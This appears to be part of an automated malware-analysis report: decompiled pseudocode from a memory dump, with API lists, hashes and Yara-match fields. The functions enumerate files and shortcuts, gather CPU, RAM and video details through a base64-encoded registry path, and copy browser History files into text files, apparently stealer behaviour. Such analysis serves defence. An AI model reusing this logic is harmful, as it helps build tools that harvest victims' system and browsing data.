								__eflags = (_v648.dwFileAttributes & 0x00000010) - 0x10;
								if((_v648.dwFileAttributes & 0x00000010) == 0x10) {
									L21:
									__eflags = _a8 - 1;
									if(_a8 != 1) {
										L30:
										__eflags = _a12 - 1;
										if(_a12 != 1) {
											goto L43;
										}
										E00403D10( &_v756, 0x104,  &(_v648.cFileName));
										E00403E64(_v756, 0x414c70);
										if(__eflags == 0) {
											goto L43;
										}
										E00403D10( &_v760, 0x104,  &(_v648.cFileName));
										E00403E64(_v760, 0x414c7c);
										if(__eflags == 0) {
											goto L43;
										}
										_t343 = _v648.dwFileAttributes;
										__eflags = (_t343 & 0x00000010) - 0x10;
										if((_t343 & 0x00000010) != 0x10) {
											goto L43;
										}
										__eflags = (_t343 & 0x00000400) - 0x400;
										if(__eflags == 0) {
											goto L43;
										}
										E0040781C(_v32, _t458,  &_v764, __eflags);
										_t349 = GetFileAttributesW(E00403D3C(_v764));
										__eflags = _t349 - 0xffffffff;
										if(_t349 == 0xffffffff) {
											goto L43;
										}
										_v53 = 0;
										_t458 = E004045EC(_v52) - 1;
										__eflags = _t458;
										if(_t458 < 0) {
											L41:
											__eflags = _v53;
											if(_v53 == 0) {
												_t354 = E004045EC(_v24) + 1;
												__eflags = _t354;
												_push(_t354);
												E004047A8();
												_t579 = _t579 + 4;
												E00403BBC(_v24 + E004045EC(_v24) * 4 - 4, _v32);
											}
											goto L43;
										}
										_t460 = _t458 + 1;
										_t575 = 0;
										__eflags = 0;
										do {
											E0040781C(_v32, _t460,  &_v776, __eflags);
											E0040377C( &_v772, _v776);
											E00406318(_v772, _t460,  &_v768, _t573, _t575);
											_push(_v768);
											E00403D2C( &_v792,  *((intOrPtr*)(_v52 + _t575 * 4)));
											E0040781C(_v792, _t460,  &_v788, __eflags);
											E0040377C( &_v784, _v788);
											E00406318(_v784, _t460,  &_v780, _t573, _t575);
											_pop(_t534);
											_t377 = E00403A78(_v780, _t534);
											__eflags = _t377;
											if(_t377 != 0) {
												_v53 = 1;
											}
											_t575 = _t575 + 1;
											_t460 = _t460 - 1;
											__eflags = _t460;
										} while (__eflags != 0);
										goto L41;
									}
									E0040377C( &_v712, _v36);
									E00406318(_v712, _t458,  &_v708, _t573, _t574);
									_t383 = E00403A78(0x414c58, _v708);
									__eflags = _t383;
									if(_t383 == 0) {
										goto L30;
									}
									E004141B8(_v32, _t458,  &_v40, _t574);
									_t387 = E004068EC(_v40);
									__eflags = _t387 - _a16;
									if(_t387 > _a16) {
										goto L30;
									}
									_t458 = E004045EC(_v44) - 1;
									__eflags = _t458;
									if(_t458 < 0) {
										goto L30;
									}
									_t458 = _t458 + 1;
									_t574 = 0;
									__eflags = 0;
									while(1) {
										E0040770C(_v40, _t458, _t474,  &_v720, _t574, __eflags);
										E0040377C( &_v716, _v720);
										_t474 = 0;
										__eflags = E00406120(_v716, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
										if(__eflags != 0) {
											break;
										}
										_t574 = _t574 + 1;
										_t458 = _t458 - 1;
										__eflags = _t458;
										if(__eflags != 0) {
											continue;
										}
										goto L30;
									}
									E0040781C(_v32, _t458,  &_v724, __eflags);
									E00403BE0( &_v32, _v724);
									E0040781C(_v8, _t458,  &_v728, __eflags);
									E00403BE0( &_v8, _v728);
									E0040781C(_v40, _t458,  &_v732, __eflags);
									E00403BE0( &_v40, _v732);
									_push(_v32);
									_push("._.");
									E0040770C(_v40, _t458, 0,  &_v736, _t574, __eflags);
									_push(_v736);
									E00403E1C();
									E00403F34( &_v48, E00403D4C(_v8), 1, __eflags);
									_push(_v16);
									_push(0x414c4c);
									_push(_v48);
									E00403E1C();
									E0040781C(_v748, _t458,  &_v744, __eflags);
									E0040377C( &_v740, _v744);
									_push(_v740);
									E0040781C(_v40, _t458,  &_v752, __eflags);
									_pop(_t556);
									E0040DDB0(_v752, _t458, _t556, _t573, _t574);
									_v20 = _v20 + 1;
									__eflags = _a4 - 1;
                                                                                                                                                                                              									if(_a4 == 1) {
                                                                                                                                                                                              										_t425 =  *0x41b638; // 0x41b0ac
                                                                                                                                                                                              										 *_t425 =  *_t425 + 1;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									goto L30;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								__eflags = _v648.nFileSizeHigh;
                                                                                                                                                                                              								if(_v648.nFileSizeHigh != 0) {
                                                                                                                                                                                              									goto L21;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                              								_push(_v648.nFileSizeLow >> 0xa);
                                                                                                                                                                                              								_t428 = _a16;
                                                                                                                                                                                              								asm("cdq");
                                                                                                                                                                                              								__eflags = 0 - _v56;
                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                              									if(__eflags < 0) {
                                                                                                                                                                                              										goto L21;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									L15:
                                                                                                                                                                                              									_t458 = E004045EC(_v44) - 1;
                                                                                                                                                                                              									__eflags = _t458;
                                                                                                                                                                                              									if(_t458 < 0) {
                                                                                                                                                                                              										goto L21;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t458 = _t458 + 1;
                                                                                                                                                                                              									_t574 = 0;
                                                                                                                                                                                              									__eflags = 0;
                                                                                                                                                                                              									while(1) {
                                                                                                                                                                                              										E0040377C( &_v684, _v36);
                                                                                                                                                                                              										_t474 = 0;
                                                                                                                                                                                              										__eflags = E00406120(_v684, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
                                                                                                                                                                                              										if(__eflags != 0) {
                                                                                                                                                                                              											break;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t574 = _t574 + 1;
                                                                                                                                                                                              										_t458 = _t458 - 1;
                                                                                                                                                                                              										__eflags = _t458;
                                                                                                                                                                                              										if(_t458 != 0) {
                                                                                                                                                                                              											continue;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										goto L21;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									E0040781C(_v8, _t458,  &_v688, __eflags);
                                                                                                                                                                                              									E00403BE0( &_v8, _v688);
                                                                                                                                                                                              									E0040781C(_v32, _t458,  &_v48, __eflags);
                                                                                                                                                                                              									_t474 = E00403D4C(_v8);
                                                                                                                                                                                              									E00403F34( &_v48, _t443, 1, __eflags);
                                                                                                                                                                                              									_push(_v16);
                                                                                                                                                                                              									_push(0x414c4c);
                                                                                                                                                                                              									_push(_v48);
                                                                                                                                                                                              									E00403E1C();
                                                                                                                                                                                              									E0040781C(_v700, _t458,  &_v696, __eflags);
                                                                                                                                                                                              									E0040377C( &_v692, _v696);
                                                                                                                                                                                              									_push(_v692);
                                                                                                                                                                                              									E0040781C(_v32, _t458,  &_v704, __eflags);
                                                                                                                                                                                              									_pop(_t570);
                                                                                                                                                                                              									E0040DDB0(_v704, _t458, _t570, _t573, _t574);
                                                                                                                                                                                              									_v20 = _v20 + 1;
                                                                                                                                                                                              									__eflags = _a4 - 1;
                                                                                                                                                                                              									if(_a4 == 1) {
                                                                                                                                                                                              										_t456 =  *0x41b638; // 0x41b0ac
                                                                                                                                                                                              										 *_t456 =  *_t456 + 1;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									goto L21;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								__eflags = _t428 -  *_t579;
                                                                                                                                                                                              								if(_t428 <  *_t579) {
                                                                                                                                                                                              									goto L21;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								goto L15;
                                                                                                                                                                                              								L43:
                                                                                                                                                                                              								_t333 = FindNextFileW(_t573,  &_v648);
                                                                                                                                                                                              								__eflags = _t333;
                                                                                                                                                                                              							} while (_t333 != 0);
                                                                                                                                                                                              							FindClose(_t573);
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						__eflags = _t301 -  *_t471;
                                                                                                                                                                                              						if(_t301 >  *_t471) {
                                                                                                                                                                                              							goto L8;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							goto L46;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L46;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}




















































































                                                                                                                                                                                              0x00414c04
                                                                                                                                                                                              0x00414c0c
                                                                                                                                                                                              0x004144c8
                                                                                                                                                                                              0x004144d1
                                                                                                                                                                                              0x004144e0
                                                                                                                                                                                              0x004144e5
                                                                                                                                                                                              0x004144f7
                                                                                                                                                                                              0x00414501
                                                                                                                                                                                              0x0041450c
                                                                                                                                                                                              0x0041450d
                                                                                                                                                                                              0x00414ac9
                                                                                                                                                                                              0x00414517
                                                                                                                                                                                              0x0041451c
                                                                                                                                                                                              0x00414521
                                                                                                                                                                                              0x00414526
                                                                                                                                                                                              0x00414529
                                                                                                                                                                                              0x0041452f
                                                                                                                                                                                              0x0041452f
                                                                                                                                                                                              0x00414532
                                                                                                                                                                                              0x0041453d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414543
                                                                                                                                                                                              0x00414555
                                                                                                                                                                                              0x00414569
                                                                                                                                                                                              0x00414576
                                                                                                                                                                                              0x00414576
                                                                                                                                                                                              0x00414577
                                                                                                                                                                                              0x00414586
                                                                                                                                                                                              0x0041458b
                                                                                                                                                                                              0x004145a3
                                                                                                                                                                                              0x004145b4
                                                                                                                                                                                              0x004145ca
                                                                                                                                                                                              0x004145cc
                                                                                                                                                                                              0x004145cc
                                                                                                                                                                                              0x004145cf
                                                                                                                                                                                              0x004145e0
                                                                                                                                                                                              0x004145e5
                                                                                                                                                                                              0x004145ea
                                                                                                                                                                                              0x004145fb
                                                                                                                                                                                              0x00414609
                                                                                                                                                                                              0x00414614
                                                                                                                                                                                              0x00414622
                                                                                                                                                                                              0x00414625
                                                                                                                                                                                              0x00414759
                                                                                                                                                                                              0x00414759
                                                                                                                                                                                              0x0041475d
                                                                                                                                                                                              0x00414912
                                                                                                                                                                                              0x00414912
                                                                                                                                                                                              0x00414916
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041492d
                                                                                                                                                                                              0x0041493d
                                                                                                                                                                                              0x00414942
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414959
                                                                                                                                                                                              0x00414969
                                                                                                                                                                                              0x0041496e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414974
                                                                                                                                                                                              0x0041497f
                                                                                                                                                                                              0x00414982
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041498d
                                                                                                                                                                                              0x00414992
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004149a1
                                                                                                                                                                                              0x004149b2
                                                                                                                                                                                              0x004149b7
                                                                                                                                                                                              0x004149ba
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004149c0
                                                                                                                                                                                              0x004149ce
                                                                                                                                                                                              0x004149cf
                                                                                                                                                                                              0x004149d1
                                                                                                                                                                                              0x00414a71
                                                                                                                                                                                              0x00414a71
                                                                                                                                                                                              0x00414a75
                                                                                                                                                                                              0x00414a7f
                                                                                                                                                                                              0x00414a7f
                                                                                                                                                                                              0x00414a80
                                                                                                                                                                                              0x00414a8f
                                                                                                                                                                                              0x00414a94
                                                                                                                                                                                              0x00414aa9
                                                                                                                                                                                              0x00414aa9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414a75
                                                                                                                                                                                              0x004149d7
                                                                                                                                                                                              0x004149d8
                                                                                                                                                                                              0x004149d8
                                                                                                                                                                                              0x004149da
                                                                                                                                                                                              0x004149e3
                                                                                                                                                                                              0x004149f4
                                                                                                                                                                                              0x00414a05
                                                                                                                                                                                              0x00414a10
                                                                                                                                                                                              0x00414a1d
                                                                                                                                                                                              0x00414a2e
                                                                                                                                                                                              0x00414a3f
                                                                                                                                                                                              0x00414a50
                                                                                                                                                                                              0x00414a5b
                                                                                                                                                                                              0x00414a5c
                                                                                                                                                                                              0x00414a61
                                                                                                                                                                                              0x00414a63
                                                                                                                                                                                              0x00414a65
                                                                                                                                                                                              0x00414a65
                                                                                                                                                                                              0x00414a69
                                                                                                                                                                                              0x00414a6a
                                                                                                                                                                                              0x00414a6a
                                                                                                                                                                                              0x00414a6a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004149da
                                                                                                                                                                                              0x0041476c
                                                                                                                                                                                              0x0041477d
                                                                                                                                                                                              0x0041478d
                                                                                                                                                                                              0x00414792
                                                                                                                                                                                              0x00414794
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004147a0
                                                                                                                                                                                              0x004147a8
                                                                                                                                                                                              0x004147ad
                                                                                                                                                                                              0x004147b0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004147c0
                                                                                                                                                                                              0x004147c1
                                                                                                                                                                                              0x004147c3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004147c9
                                                                                                                                                                                              0x004147ca
                                                                                                                                                                                              0x004147ca
                                                                                                                                                                                              0x004147cc
                                                                                                                                                                                              0x004147d5

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,0041A69E), ref: 004145C5
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeString$FileFindFirst
                                                                                                                                                                                              • String ID: .LNK$._.$0_@$LLA$CA
                                                                                                                                                                                              • API String ID: 1653790112-882170572
                                                                                                                                                                                              • Opcode ID: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
                                                                                                                                                                                              • Instruction ID: 9c4ae2fa8e47753b2fad7318643bbdaa039e98a1c6b9804601cb0bccf78cece1
                                                                                                                                                                                              • Opcode Fuzzy Hash: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A224374A0011E9BCB10EF55C985ADEB7B9EF84308F1081B7E504B7296DB38AF858F59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E00416740(intOrPtr* __eax, void* __ebx, void* __esi) {
                                                                                                                                                                                              				struct _SYSTEM_INFO _v40;
                                                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				char _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				intOrPtr _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				signed int _t38;
                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                              				signed int _t92;
                                                                                                                                                                                              				void* _t93;
                                                                                                                                                                                              				void* _t94;
                                                                                                                                                                                              				intOrPtr _t113;
                                                                                                                                                                                              				void* _t117;
                                                                                                                                                                                              				intOrPtr _t120;
                                                                                                                                                                                              				intOrPtr _t121;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t118 = __esi;
                                                                                                                                                                                              				_t38 = __eax +  *__eax;
                                                                                                                                                                                              				 *_t38 =  *_t38 + _t38;
                                                                                                                                                                                              				_t39 = _t38 | 0x5500000a;
                                                                                                                                                                                              				_t120 = _t121;
                                                                                                                                                                                              				_t93 = 0xb;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t93 = _t93 - 1;
                                                                                                                                                                                              					_t124 = _t93;
                                                                                                                                                                                              				} while (_t93 != 0);
                                                                                                                                                                                              				_t92 = _t39;
                                                                                                                                                                                              				_push(_t120);
                                                                                                                                                                                              				_push(0x4168d4);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t121;
                                                                                                                                                                                              				GetSystemInfo( &_v40);
                                                                                                                                                                                              				E00403D2C( &_v48,  *_t92);
                                                                                                                                                                                              				_push(_v48);
                                                                                                                                                                                              				_push(L"CPU Model: ");
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push( &_v52);
                                                                                                                                                                                              				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t92,  &_v60, _t117, __esi);
                                                                                                                                                                                              				E00403D2C( &_v56, _v60);
                                                                                                                                                                                              				_push(_v56);
                                                                                                                                                                                              				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t92,  &_v68, _t117, __esi);
                                                                                                                                                                                              				E00403D2C( &_v64, _v68);
                                                                                                                                                                                              				_pop(_t94);
                                                                                                                                                                                              				E00407500(0x80000002, _t92, _t94, _v64);
                                                                                                                                                                                              				_push(_v52);
                                                                                                                                                                                              				_push(0x416974);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040377C(_t92, _v44);
                                                                                                                                                                                              				E004037DC( &_v80, "CPU Count: ",  *_t92);
                                                                                                                                                                                              				E00403D2C( &_v76, _v80);
                                                                                                                                                                                              				_push(_v76);
                                                                                                                                                                                              				E00406FDC(_v40.dwNumberOfProcessors, _t92,  &_v84, __esi, _t124);
                                                                                                                                                                                              				_push(_v84);
                                                                                                                                                                                              				_push(0x416974);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040377C(_t92, _v72);
                                                                                                                                                                                              				_push( *_t92);
                                                                                                                                                                                              				_push("GetRAM: ");
                                                                                                                                                                                              				E00416584( &_v88, _t92, _t118, _t124);
                                                                                                                                                                                              				_push(_v88);
                                                                                                                                                                                              				_push(0x4169ac);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t92);
                                                                                                                                                                                              				_push("Video Info\r\n");
                                                                                                                                                                                              				E00416644( &_v92, _t92, _t117, _t118);
                                                                                                                                                                                              				_push(_v92);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_t113 = 0x4169ac;
                                                                                                                                                                                              				 *[fs:eax] = _t113;
                                                                                                                                                                                              				_push(E004168DB);
                                                                                                                                                                                              				E00403508( &_v92, 2);
                                                                                                                                                                                              				E00403B80( &_v84);
                                                                                                                                                                                              				E004034E4( &_v80);
                                                                                                                                                                                              				E00403B98( &_v76, 2);
                                                                                                                                                                                              				E004034E4( &_v68);
                                                                                                                                                                                              				E00403B80( &_v64);
                                                                                                                                                                                              				E004034E4( &_v60);
                                                                                                                                                                                              				return E00403B98( &_v56, 4);
                                                                                                                                                                                              			}



























                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeString$InfoSystem
                                                                                                                                                                                              • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                                                                                                              • API String ID: 4070941872-1038824218
                                                                                                                                                                                              • Opcode ID: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
                                                                                                                                                                                              • Instruction ID: ec5783c0b7ca42e81122729fbed3a1ddf4b85dfc6774dd9c704540b43fb157b1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 64411270A1010D9BDB01FFD1D882ADDBBB9EF48309F51403BF504B7296D639EA458B59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 52%
                                                                                                                                                                                              			E00412D70(signed int __eax, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                              				intOrPtr _v117;
                                                                                                                                                                                              				struct _WIN32_FIND_DATAW _v616;
                                                                                                                                                                                              				char _v620;
                                                                                                                                                                                              				intOrPtr _v624;
                                                                                                                                                                                              				char _v628;
                                                                                                                                                                                              				char _v632;
                                                                                                                                                                                              				char _v636;
                                                                                                                                                                                              				char _v640;
                                                                                                                                                                                              				char _v644;
                                                                                                                                                                                              				char _v648;
                                                                                                                                                                                              				char _v652;
                                                                                                                                                                                              				intOrPtr _v656;
                                                                                                                                                                                              				char _v660;
                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                              				void* _t112;
                                                                                                                                                                                              				void* _t114;
                                                                                                                                                                                              				intOrPtr _t116;
                                                                                                                                                                                              				intOrPtr _t131;
                                                                                                                                                                                              				intOrPtr _t136;
                                                                                                                                                                                              				intOrPtr _t148;
                                                                                                                                                                                              				intOrPtr _t149;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t146 = __esi;
                                                                                                                                                                                              				_t145 = __edi;
                                                                                                                                                                                              				_pop(_t114);
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				_pop(_t147);
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				_t58 = __eax | 0x00000a00;
                                                                                                                                                                                              				 *_t58 =  *_t58 + _t58;
                                                                                                                                                                                              				 *_t58 =  *_t58 + __ecx;
                                                                                                                                                                                              				 *_t58 =  *_t58 + _t58;
                                                                                                                                                                                              				 *0xd000a00 =  *0xd000a00 + __ecx;
                                                                                                                                                                                              				 *((intOrPtr*)(__edx)) =  *((intOrPtr*)(__edx)) + __ecx;
                                                                                                                                                                                              				 *_t58 =  *_t58 + _t58;
                                                                                                                                                                                              				 *_t58 =  *_t58 + _t58;
                                                                                                                                                                                              				_v117 = _v117 + __edx;
                                                                                                                                                                                              				_t148 = _t149;
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t116 = 0x51;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t116 = _t116 - 1;
                                                                                                                                                                                              				} while (_t116 != 0);
                                                                                                                                                                                              				_push(_t116);
                                                                                                                                                                                              				_t7 =  &_v8;
                                                                                                                                                                                              				 *_t7 = _t116;
                                                                                                                                                                                              				_push(_t114);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v16 =  *_t7;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = _t58;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				E004040F4( &_v12);
                                                                                                                                                                                              				E004040F4( &_v16);
                                                                                                                                                                                              				_push(_t148);
                                                                                                                                                                                              				_push(0x412fe0);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t149;
                                                                                                                                                                                              				E00403DB8( &_v620, L"\\*.*", _v8, 0);
                                                                                                                                                                                              				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(_v8);
                                                                                                                                                                                              					_push(0x413008);
                                                                                                                                                                                              					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              					_push(_v628);
                                                                                                                                                                                              					_push(0x413008);
                                                                                                                                                                                              					E0040813C(0x61,  &_v632);
                                                                                                                                                                                              					_push(_v632);
                                                                                                                                                                                              					E00403E1C();
                                                                                                                                                                                              					if(E004076B0(_v624, _t114, 0x104) != 0) {
                                                                                                                                                                                              						_push(_t148);
                                                                                                                                                                                              						_push(0x412f54);
                                                                                                                                                                                              						_push( *[fs:eax]);
                                                                                                                                                                                              						 *[fs:eax] = _t149;
                                                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                                                              							_push(_v8);
                                                                                                                                                                                              							_push(0x413008);
                                                                                                                                                                                              							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              							_push(_v648);
                                                                                                                                                                                              							_push(L"\\History");
                                                                                                                                                                                              							E00403E1C();
                                                                                                                                                                                              							E004129A4(_v644, _t114,  &_v640, _t145, _t146);
                                                                                                                                                                                              							E0040377C( &_v636, _v640);
                                                                                                                                                                                              							_push(_v636);
                                                                                                                                                                                              							_push(_v16);
                                                                                                                                                                                              							_push(0x413008);
                                                                                                                                                                                              							_push(_v12);
                                                                                                                                                                                              							_push(0x413028);
                                                                                                                                                                                              							E00403D10( &_v660, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              							_push(_v660);
                                                                                                                                                                                              							_push(L".txt");
                                                                                                                                                                                              							E00403E1C();
                                                                                                                                                                                              							E0040377C( &_v652, _v656);
                                                                                                                                                                                              							_pop(_t112);
                                                                                                                                                                                              							E0040DCE8(_t112, _t114, _v652, _t145, _t146);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_pop(_t136);
                                                                                                                                                                                              						 *[fs:eax] = _t136;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} while (FindNextFileW(_v24,  &_v616) != 0);
                                                                                                                                                                                              				FindClose(_v24);
                                                                                                                                                                                              				_pop(_t131);
                                                                                                                                                                                              				 *[fs:eax] = _t131;
                                                                                                                                                                                              				_push(E00412FE7);
                                                                                                                                                                                              				E00403B98( &_v660, 2);
                                                                                                                                                                                              				E004034E4( &_v652);
                                                                                                                                                                                              				E00403B98( &_v648, 3);
                                                                                                                                                                                              				E004034E4( &_v636);
                                                                                                                                                                                              				E00403B98( &_v632, 4);
                                                                                                                                                                                              				return E00403B98( &_v16, 3);
                                                                                                                                                                                              			}




























                                                                                                                                                                                              0x00412db2
                                                                                                                                                                                              0x00412db3
                                                                                                                                                                                              0x00412db6
                                                                                                                                                                                              0x00412db9
                                                                                                                                                                                              0x00412dbf
                                                                                                                                                                                              0x00412dc7
                                                                                                                                                                                              0x00412dcf
                                                                                                                                                                                              0x00412dd6
                                                                                                                                                                                              0x00412dd7
                                                                                                                                                                                              0x00412ddc
                                                                                                                                                                                              0x00412ddf
                                                                                                                                                                                              0x00412df7
                                                                                                                                                                                              0x00412e0d
                                                                                                                                                                                              0x00412e10
                                                                                                                                                                                              0x00412e10
                                                                                                                                                                                              0x00412e13
                                                                                                                                                                                              0x00412e29
                                                                                                                                                                                              0x00412e2e
                                                                                                                                                                                              0x00412e34
                                                                                                                                                                                              0x00412e44
                                                                                                                                                                                              0x00412e49
                                                                                                                                                                                              0x00412e5a
                                                                                                                                                                                              0x00412e6c
                                                                                                                                                                                              0x00412e74
                                                                                                                                                                                              0x00412e75
                                                                                                                                                                                              0x00412e7a
                                                                                                                                                                                              0x00412e7d
                                                                                                                                                                                              0x00412e84
                                                                                                                                                                                              0x00412e8a
                                                                                                                                                                                              0x00412e8d
                                                                                                                                                                                              0x00412ea3
                                                                                                                                                                                              0x00412ea8
                                                                                                                                                                                              0x00412eae
                                                                                                                                                                                              0x00412ebe
                                                                                                                                                                                              0x00412ecf
                                                                                                                                                                                              0x00412ee0
                                                                                                                                                                                              0x00412eeb
                                                                                                                                                                                              0x00412eec
                                                                                                                                                                                              0x00412eef
                                                                                                                                                                                              0x00412ef4
                                                                                                                                                                                              0x00412ef7
                                                                                                                                                                                              0x00412f0d
                                                                                                                                                                                              0x00412f12
                                                                                                                                                                                              0x00412f18
                                                                                                                                                                                              0x00412f28
                                                                                                                                                                                              0x00412f39
                                                                                                                                                                                              0x00412f44
                                                                                                                                                                                              0x00412f45
                                                                                                                                                                                              0x00412f45
                                                                                                                                                                                              0x00412f4c
                                                                                                                                                                                              0x00412f4f
                                                                                                                                                                                              0x00412f4f
                                                                                                                                                                                              0x00412f6e
